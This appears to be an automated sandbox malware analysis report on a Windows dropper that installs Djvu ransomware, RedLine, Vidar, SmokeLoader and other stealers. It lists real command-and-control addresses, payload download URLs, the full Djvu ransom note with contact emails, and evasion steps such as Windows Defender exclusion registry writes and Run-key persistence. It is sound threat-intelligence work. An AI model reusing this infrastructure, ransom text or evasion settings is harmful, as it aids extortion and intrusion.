djvu | cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0

Analysis

max time kernel
4294119s
max time network
159s
platform
windows7_x64
resource
win7-20220311-en
submitted
14-03-2022 05:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
Size

7.7MB
MD5

0afafc9f81b758427c2d307bbb79cfdd
SHA1

dfc691cd9375e59ea48d3644cdbedc75a09ef39d
SHA256

cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0
SHA512

60e5591e7c794bff610ebcec2095550dbab70a9ae04b045f9bf23f7cc6f9c5d0dbca5bc13529df752ccc5a8aa7b079fe1227c5e955d223c7ee25a542fd518362

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

redline

Botnet

UDP

45.9.20.20:13441

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

vidar

Version

50.7

Botnet

937

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

redline

Botnet

ruzki12_03

176.122.23.55:11768

Attributes

auth_value
c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

Detected Djvu ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2444-253-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/2444-266-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1008-139-0x0000000001420000-0x0000000001D3E000-memory.dmp	family_glupteba
behavioral1/memory/1008-140-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba
behavioral1/memory/428-155-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba
behavioral1/memory/840-169-0x0000000000400000-0x0000000000D39000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1164-114-0x00000000003E0000-0x0000000000406000-memory.dmp	family_redline
behavioral1/memory/1164-116-0x0000000001F40000-0x0000000001F64000-memory.dmp	family_redline
behavioral1/memory/2464-202-0x0000000001230000-0x00000000013E4000-memory.dmp	family_redline
behavioral1/memory/2464-208-0x0000000001230000-0x00000000013E4000-memory.dmp	family_redline
behavioral1/memory/2876-224-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2876-246-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2876-245-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 5 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2808	bcdedit.exe
1196	bcdedit.exe
632	bcdedit.exe
3000	bcdedit.exe
2112	bcdedit.exe
2900	bcdedit.exe
2304	bcdedit.exe
2568	bcdedit.exe
2536	bcdedit.exe
2648	bcdedit.exe
2428	bcdedit.exe
2152	bcdedit.exe
2532	bcdedit.exe
2512	bcdedit.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2232-185-0x00000000002E0000-0x0000000000324000-memory.dmp	family_onlylogger
behavioral1/memory/2232-177-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/2216-223-0x0000000000400000-0x00000000004CE000-memory.dmp	family_vidar
behavioral1/memory/2216-225-0x0000000000220000-0x00000000002CC000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 20 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exejfiag3g_gg.exeGraphics.exejfiag3g_gg.execsrss.exepatch.exek7D0g8NM08633xtjv4iGBCZw.exeje4UrxDMZO_PWbRkE5E29E3t.exePUC2rv9TQnElnu7bjl8s8OWk.exeiTKXKd2CkhjXXWhcfQ3bSfYo.exefMMQO1c_SPfeXHPv8JTKtqY4.exe2E5ZH7XjOjT1D_2bK2Mz4sCQ.exe

pid	process
520	SoCleanInst.exe
768	md9_1sjm.exe
1468	Folder.exe
1008	Graphics.exe
1164	Updbdate.exe
872	Install.exe
2020	Files.exe
1568	pub2.exe
972	File.exe
1564	jfiag3g_gg.exe
428	Graphics.exe
1528	jfiag3g_gg.exe
840	csrss.exe
836	patch.exe
2072	k7D0g8NM08633xtjv4iGBCZw.exe
2192	je4UrxDMZO_PWbRkE5E29E3t.exe
2216	PUC2rv9TQnElnu7bjl8s8OWk.exe
2232	iTKXKd2CkhjXXWhcfQ3bSfYo.exe
2244	fMMQO1c_SPfeXHPv8JTKtqY4.exe
2264	2E5ZH7XjOjT1D_2bK2Mz4sCQ.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

File.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation File.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 57 IoCs

Processes:

cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exeFiles.exeGraphics.exepatch.exeFile.exe

pid	process
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
1968	cfb27ba8ff3737c3d09c1909ec16b837515aab2eb8419bc800913dd0023324f0.exe
2020	Files.exe
2020	Files.exe
2020	Files.exe
2020	Files.exe
428	Graphics.exe
428	Graphics.exe
880
836	patch.exe
836	patch.exe
836	patch.exe
836	patch.exe
836	patch.exe
972	File.exe
972	File.exe
972	File.exe
972	File.exe
972	File.exe
972	File.exe
972	File.exe
972	File.exe
972	File.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

Graphics.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\FallingBrook = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Graphics.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Graphics.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Windows\CurrentVersion\Run\FallingBrook = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

70 ipinfo.io
212 ipinfo.io
213 ipinfo.io
11 ip-api.com
69 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
70	ipinfo.io
212	ipinfo.io
213	ipinfo.io
11	ip-api.com
69	ipinfo.io

Drops file in Windows directory 3 IoCs

Processes:

Graphics.exemakecab.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	Graphics.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20220314050742.cab	makecab.exe
File opened for modification	C:\Windows\rss	Graphics.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2120 2444 WerFault.exe qKlQzA06rwnd_YZXoLE6OPAX.exe
2508 2380 WerFault.exe 6ac7yeCSinoAQH2LnzSazko4.exe

pid	pid_target	process	target process
2120	2444	WerFault.exe	qKlQzA06rwnd_YZXoLE6OPAX.exe
2508	2380	WerFault.exe	6ac7yeCSinoAQH2LnzSazko4.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2852 schtasks.exe
2952 schtasks.exe
1268 schtasks.exe
928 schtasks.exe
2692 schtasks.exe
2180 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1200 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2256 tasklist.exe
2704 tasklist.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1464 taskkill.exe
2940 taskkill.exe
1064 taskkill.exe

pid	process
2852	schtasks.exe
2952	schtasks.exe
1268	schtasks.exe
928	schtasks.exe
2692	schtasks.exe
2180	schtasks.exe

pid	process
1200	timeout.exe

pid	process
2256	tasklist.exe
2704	tasklist.exe

pid	process
1464	taskkill.exe
2940	taskkill.exe
1064	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	Graphics.exe
